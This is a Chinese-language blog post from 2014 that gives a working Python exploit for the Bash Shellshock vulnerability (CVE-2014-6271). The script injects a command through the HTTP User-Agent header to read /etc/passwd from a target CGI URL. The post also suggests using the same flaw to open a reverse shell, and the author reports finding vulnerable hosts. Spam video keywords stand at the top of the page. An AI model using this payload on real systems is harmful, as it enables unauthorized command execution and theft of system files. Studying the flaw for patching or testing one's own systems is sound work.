久久人人看视频,久热精品在线视频,久久在线视频

blog已經轉移至github,大家請訪問 http://qaseven.github.io/

Bash遠程命令執行漏洞(CVE-2014-6271)分析利用

這幾天Bash被爆存在遠程命令執行漏洞(CVE-2014-6271)，昨天參加完isc，晚上回家測試了一下，寫了個python版本的測試小基本，貼上代碼：

#coding:utf-8

import urllib,httplib

import sys,re,urlparse

#author:nx4dm1n

#website:http://www.nxadmin.com

def bash_exp(url):

urlsp=urlparse.urlparse(url)

hostname=urlsp.netloc

urlpath=urlsp.path

conn=httplib.HTTPConnection(hostname)

headers={"User-Agent":"() { :;}; echo `/bin/cat /etc/passwd`"}

conn.request("GET",urlpath,headers=headers)

res=conn.getresponse()

res=res.getheaders()

for passwdstr in res:

print passwdstr[0]+':'+passwdstr[1]

if __name__=='__main__':

#帶http

if len(sys.argv)<2:

print "Usage: "+sys.argv[0]+" http://www.nxadmin.com/cgi-bin/index.cgi"

sys.exit()

else:

bash_exp(sys.argv[1])

　　腳本執行效果如圖所示：

　　bash命令執行

　　也可以用burp進行測試。

　　利用該漏洞其實可以做很多事情，寫的python小腳本只是執行了cat /etc/passwd?？梢詧绦蟹聪蜴溄拥拿畹龋苯荧@取一個shell還是有可能的。不過漏洞存在的條件也比較苛刻，測試找了一些，發現了很少幾個存在漏洞

posted on 2014-12-08 20:43 順其自然EVO 閱讀(348) 評論(0) 編輯收藏所屬分類: 測試學習專欄


只有注冊用戶登錄后才能發表評論。




網站導航: 博客園 IT新聞 Chat2DB C++博客博問管理
相關文章: 如何進行Web服務的性能測試？利用drozer進行Android滲透測試 Appium Android Bootstrap源碼分析之命令解析執行 Fliptest—iOS 的應用A/B測試框架 iOS功能測試工具 Frank iOS單元測試框架Kiwi for iOS Appium Android Bootstrap之控件AndroidElement 移動應用測試框架—Calabash Android 簡介 Appium Server源碼分析之作為Bootstrap客戶端移植MonkeyRunner的圖片對比功能實現-Appium篇